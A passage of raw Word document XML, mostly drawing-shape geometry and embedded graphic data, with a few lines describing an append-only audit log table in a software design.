                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128687"/>
                                  <a:pt x="635385" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650"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12" name="Shape 2112"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="523875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="523875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="514350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="516980" y="0"/>
                                  <a:pt x="519225" y="918"/>
                                  <a:pt x="521085" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="522945" y="4638"/>
                                  <a:pt x="523875" y="6883"/>
                                  <a:pt x="523875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="523875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="523875" y="126454"/>
                                  <a:pt x="522945" y="128687"/>
                                  <a:pt x="521085" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="519225" y="132407"/>
                                  <a:pt x="516980" y="133338"/>
                                  <a:pt x="514350" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2778"/>
                                </a:ln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DB9E8FB" id="Group 27015" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-.8pt;width:82.5pt;height:24pt;z-index:-251396096" coordsize="10477,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&#10;">
                <v:shape id="Shape 2109" o:spid="_x0000_s1027" style="position:absolute;left:4095;width:6382;height:1333;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jFPwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeAVvmrhIsatRpGDxUmjV3p+b52Zx87IkUdd/3whCj8PMfMMsVr1rxZVCbDxrmIwVCOLK&#10;m4ZrDYf9ZjQDEROywdYzabhThNXyZbDA0vgb/9B1l2qRIRxL1GBT6kopY2XJYRz7jjh7Jx8cpixD&#10;LU3AW4a7VhZKvUmHDecFix19WKrOu4vToLafR0Ob3+l+PY3Bzgp/+fr2Wg9f+/UcRKI+/Yef7a3R&#10;UEzUOzze5Ccgl38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAfe4xT8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l628650,v2630,,4875,930,6735,2778c637245,4638,638175,6896,638175,9525r,114300c638175,126454,637245,128687,635385,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126454,,123825l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,133350"/>
                </v:shape>
                <v:shape id="Shape 2112" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:5238;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5238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JxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NbsIw&#10;EITvlXgHa5F6QcVJDrQKGFT1D1r1EuABVvGSRI3Xqe0m4e0xElKPo5n5RrPajKYVPTnfWFaQzhMQ&#10;xKXVDVcKjof3hycQPiBrbC2TgjN52KwndyvMtR24oH4fKhEh7HNUUIfQ5VL6siaDfm474uidrDMY&#10;onSV1A6HCDetzJJkIQ02HBdq7OilpvJn/2cUfA+9LIvZ12snzfat+Px1i4/to1L30/F5CSLQGP7D&#10;t/ZOK8jSNIPrm/gE5PoCAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAf1HECcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l514350,v2630,,4875,918,6735,2778c522945,4638,523875,6883,523875,9525r,114300c523875,126454,522945,128687,521085,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803l,123825,,9525,2790,2778c4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,523875,133350"/>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An </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> table recording action, severity, actor, subject, a before/after JSON diff, and request provenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A7FC4" w14:textId="3A814C56" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="59" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AuditLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>append-only in code</w:t>
      </w:r>
      <w:r w:rsidR="00C73B1A">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performUpdate</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and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>delete(</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throw</w:t>
      </w:r>
      <w:r w:rsidR="00C73B1A">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 because</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an audit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker can edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1874451E" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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1408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EDD27B1" wp14:editId="75487E67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1094482</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-190738</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2647950" cy="657225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27019" name="Group 27019"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2647950" cy="657225"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2647950" cy="657225"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2117" name="Shape 2117"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="933450" y="0"/>
                            <a:ext cx="933450" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="918"/>
                                  <a:pt x="930660" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4638"/>
                                  <a:pt x="933450" y="6883"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="126454"/>
                                  <a:pt x="932520" y="128687"/>
                                  <a:pt x="930660" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="132407"/>
                                  <a:pt x="926555" y="133338"/>
                                  <a:pt x="923925" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>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20" name="Shape 2120"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2124075" y="0"/>
                            <a:ext cx="523875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="523875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="514350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="516980" y="0"/>
                                  <a:pt x="519225" y="918"/>
                                  <a:pt x="521085" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="522945" y="4638"/>
                                  <a:pt x="523875" y="6883"/>
                                  <a:pt x="523875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="523875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="523875" y="126454"/>
                                  <a:pt x="522945" y="128687"/>
                                  <a:pt x="521085" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="519225" y="132407"/>
                                  <a:pt x="516980" y="133338"/>
                                  <a:pt x="514350" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>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24" name="Shape 2124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="390525" y="171450"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126454"/>
                                  <a:pt x="694395" y="128699"/>
                                  <a:pt x="692535" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132407"/>
                                  <a:pt x="688430" y="133338"/>
                                  <a:pt x="685800" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>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34" name="Shape 2134"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="514350"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="918"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6883"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138212"/>
                                  <a:pt x="282960" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141932"/>
                                  <a:pt x="278855" y="142863"/>
                                  <a:pt x="276225"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37" name="Shape 2137"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1219200" y="514350"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="918"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6883"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138212"/>
                                  <a:pt x="578235" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141932"/>
                                  <a:pt x="574130" y="142863"/>
                                  <a:pt x="571500"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08D4565" id="Group 27019" o:spid="_x0000_s1026" style="position:absolute;margin-left:86.2pt;margin-top:-15pt;width:208.5pt;height:51.75pt;z-index:-251395072" coordsize="26479,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